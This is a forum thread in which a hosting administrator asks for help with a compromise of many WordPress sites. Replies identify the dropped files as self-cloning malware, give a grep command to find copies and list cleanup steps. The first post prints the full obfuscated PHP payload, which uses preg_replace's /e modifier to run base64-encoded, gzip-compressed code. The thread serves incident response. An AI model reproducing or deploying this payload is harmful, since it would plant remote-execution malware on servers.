Results 1 to 6 of 6
  1. #1
    Join Date
    Apr 2013
    Location
    Boston, MA
    Posts
    390

    Server is being raped by single php script being uploaded and requested several times

    Hello guys,

    Sorry for the title but this is really what's going on.

    The server has always high loads, is always super slow.

    It is a Xeon E3-1270 with 18gb of RAM, raid10 with about 300 domains. Hardware is not the problem.

    Please see this screenshot:

    http://d.pr/i/BilG

    those are only a few lines that I copied from the Apache server status page.
    Multiply those by 5.

    What happens is, a LOT of domains now have random 5 letters folders created in the root directory, and then a single index.php file is uploaded.

    This is the code of the index.php file, they are obfuscating it:

    Code:
    <?php $e="gzu"."ncom"."p"."re"."ss";$h="preg_re"."pl"."ace";$o="ba"."se6"."4_deco"."de";$h("/"."e"."k"."m"."qxe"."/e",$e($o("e"."F7NWFlv4kgQ/i8jIe"."08L"."MIHh7VPhCskJGEIYZK8oLbdB"."oO"."xiQ8I8+u3u9p9mGsI2pVGioj"."prvrqq7Pb4A0K/orRNosDFzuRi//65mWh"."k/pRWNIrvfVD"."15tsyFNJb5R0c7b038YlvQUL5k1zlKLVz5Ju0"."e/1G7"."Z6Oxm3HapcMtrkE8Ux2oG2VTKoiBfF"."Au9lPCdSFbbBv7f0a"."q2wot/A3zEr"."1Ztc"."pkptMYscByTr+cpT+jB+FSK5xf+GShGaoYk1Kn2aL+xGsatGV4jQ/"."Sr5TNI"."4wGEhARboWzkRkFK"."Zrlu/FoOdq3A6Zp9LH9k6oci8OqEqNhVlTqS"."Yi9w5NRNC/3B9NkB"."DN90psDr9O0igu2iiTiG"."F+UpLDaBSs0WxY5lV"."icoqoc9UQDsV/qsL4jjcH5pNNTNlIcPjCyAssgyk"."SkJcc"."eYxC4diau"."/rfnec5FUMFltR6izGaRbDGJJE5bYZj53PzX"."2quKdrDc/"."0DEdzK1Y"."duZZhOdWap+Eq8ipazWiY2NU1VM"."G"."i+sy3YPIRDjMVw0SeW29YrlFBul1HDc+2DN"."yokQXH"."sXVL04w6qusa"."lhUsh+3O6Y8GyzmLyMdLNH5Qy1H4Y6ME"."T50o3"."OA4LcjSqaxV2H+jthcOxc6HN2F6ttNFq"."olZENkoAEfM/vB512EABcs1c4pDek4Q"."CHE6UDCmwI8GAV0gQTZ"."esxf6APHykwTnLkyfO6NJZwQ5rt+"."Ox8NpZ9zskWeZaqPLE"."M6LErkmddcP8HSGUxqoFIdpAmb09X"."wN+wSq64f"."rLI"."Vh"."knP0PTBA5DRO"."lBp2fSwqPnc"."y559kNhktzAEQp87nCaiqE2aB7+2"."3O+APiqcClweYHcRk96gBQFZDq5vLGR48CHT8uQ6YvjjU"."mffQUOAvT5MgJrHG2G/"."fPb8LNGa92C6wAQ"."f7NJn7Xp"."7DnIVkxgP6xTzn+B4KEkzthO4xZqpMIU3J1k8d2kVnCep5"."zTsIjNDWtaApafUQ2WTSWtzL6X8aq+Dp"."Osaz6Qox+"."xDrLn2otpJSvUX"."+le"."k/Mr"."PoZ40tQV1"."bIKiLvHDrOVW1BN/87sfkX"."Q4u149D"."tKIZnk67/UFnOiU6ZWabP"."OplCVegC"."h2"."CP/0k7w"."0JTC2KoOP15PF"."u+SnMlcwTvVXQ56T"."1hhg2Ak"."jWh3DLjjFaskeZD90R+ZCdqRYBaVO"."gl"."MbZfg3gDZ"."1jD"."X91cSccFO9"."5"."cti4npyi8LF4yYb0G8h"."GaxySdDKKLIWFWt3OSeS5LlX3e08v8qZNeLpcnSNzfUZn"."v2cYLOejTpscWRlo/LbDYQi9v4Fi"."Be5gX1amtclWszDww2VBtXhqwOf5fNhI5IOgp"."K3dk73OD"."f7fzVtvWV7dBFcKPcxJKO3Ae7jZznZO76cgeEkP53Dne1"."gAU4"."tX9LCqz0n"."DhtK9F3SHJruD2yJnrWrrnMfleYocByeJ"."iOb+uUgTbtw"."t31/7s7efn4ltOMl7b5LhH1FjtA"."qS99fH"."x7f"."X0QK"."1mv6rP1/bq1GAu9vM6c2"."39+PGs"."r8w7/ut5qzf6yZ2zzL6vfedTa4/FKu12G4KGG0Tgs"."Z7kY0XZx6V+EVqkUShvB"."PJ110"."aiA"."XrEKj7DkuGcmnMo3xRSD1PLX"."B/NE9/yBP/X"."DRpk5Yv7"."IDSp"."SOsEIATtcQ5"."Sg8LjS52L3C+Ko8C2gnNx/Hnai"."G8/41zZGF"."wKy/p15wJ"."hSC"."pb5OCC"."ptuNMX0hQQm4vq6c"."UKhinNEtcFmrcIAX"."FOsa1Rn"."f95E"."qffRG"."4kQ/L"."ZcF"."KvF+mDNnPi/"."8rHAgRkBStj"."QzGqd7"."sESf5Ee/bi5i2EaAQH5puOv9SAKZwy"."tcDkcdR6exp1ps90eKdd"."Dq3wqa2UJmvrg3O8U9l9nDqeMiC4vpe"."PDTAkEDU"."EyRxpb5W6fISGkysNbchl+GjAMS"."EtzOOw8gt/M+"."gXnoOOK"."TvlyU199"."LyEKydz7"."EPIHP/nRelpA9x7f/zMvNgyfu"."UZKUvkt5AQgIBVnxXHB"."05blrSiP2RcNqzcmzN6fjueIBetYdt"."Qd"."hnPpaecDeeYPHUY"."an2H6Zm+HvIdvcJz"."A7xFQBlw"."Q7wnSpnh6F"."tvZ3rbwKt/fHu6Da/n"."2"."cm+bHlpBhFzsklsU6WZK"."iDW0ZBQc"."QDbsKCKrlh/6"."9NgDeT1BHp6uICoigaxGLzrh6MS"."4t"."m+PjaRzIx"."5"."ulKcP"."TXD8mlPynKfq7Pr2/fs//wIl1Ulz")),"/e"."kmqx"."e/e"); ?>
    I put it also on pastebin: http://pastebin.com/sBvEsmCx

    The thing is, those files are being requested 24/7, slowing down the server, and I don't really know what's going on, I can't read what the index.php does. If the folders are deleted, new folders are created somehow.

    No spam is being sent as far as I'm concerned.

    Right now I am researching how I can add a custom signature to ClamAV as it is the only way I came up to block it...

    Does anybody know what's going on here?
    Can anybody help?

    Thank you.
    Last edited by v33usa; 11-22-2013 at 12:34 AM.

  2. #2
    Join Date
    May 2012
    Location
    India
    Posts
    1,026
    It certainly looks like your domains are hacked and they have placed scripts of their own. Please go ahead and see how that was done, and remove asap.

  3. #3
    Ohoh,
    I've decoded your script:
    http://pastebin.com/k62t1RmA

    It's a malware, delete it ASAP, check the web access log to find out why it's there.

  4. #4
    Join Date
    Apr 2013
    Location
    Boston, MA
    Posts
    390
    The problem is that the scripts are being re-created or re-uploaded..

    All of the afected domains have the latest version of Wordpress.
    Last edited by v33usa; 11-22-2013 at 03:26 AM.

  5. #5
    Of course,
    This malicious script will clone itself to every root-of-public-folder. So you have to find and delete them.

    If you're using cPanel, the root of public folder is /home/<user>/public_html/, so:

    Code:
    $ grep -r "b3JkZXIgYWxsb3csZGVueQo8RmlsZXNNYXRj" /home/*/public_html/
    will help you to find out the cloned.

    To resolve this issue through, you need to check access log, "latest version of Wordpress" does not mean plugins have no bug. Or the malicious script/backdoor has been on your server for a long time.

  6. #6
    Join Date
    Apr 2011
    Location
    Core Files
    Posts
    7,790
    Quote Originally Posted by v33usa View Post
    The problem is that the scripts are being re-created or re-uploaded..

    All of the afected domains have the latest version of Wordpress.
    Unfortunately this is going to take some work;

    1. contact your host about the issue
    2. see if they offer any service to clean your entire account
    3. check to see if you have any clean backups
    4. have the host either delete your account and restore a clean backup
    5. change the user name
    6. change passwords
    7. delete not needed plugins
    8. delete not needed themes



    That list is not an exact order of things to do, but when the exploit starts to recreate itself, in some cases all your files could have been affected, which could be hundreds to thousands.

    How many WordPress sites are there?

Similar Threads

  1. Replies: 8
    Last Post: 08-03-2010, 05:39 AM
  2. Replies: 9
    Last Post: 10-21-2008, 04:59 AM
  3. Replies: 13
    Last Post: 09-11-2007, 02:14 AM
  4. Replies: 4
    Last Post: 05-20-2006, 03:58 AM
  5. Transfering PHP uploaded files from one server to another
    By jon31 in forum Programming Discussion
    Replies: 5
    Last Post: 05-04-2006, 05:47 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •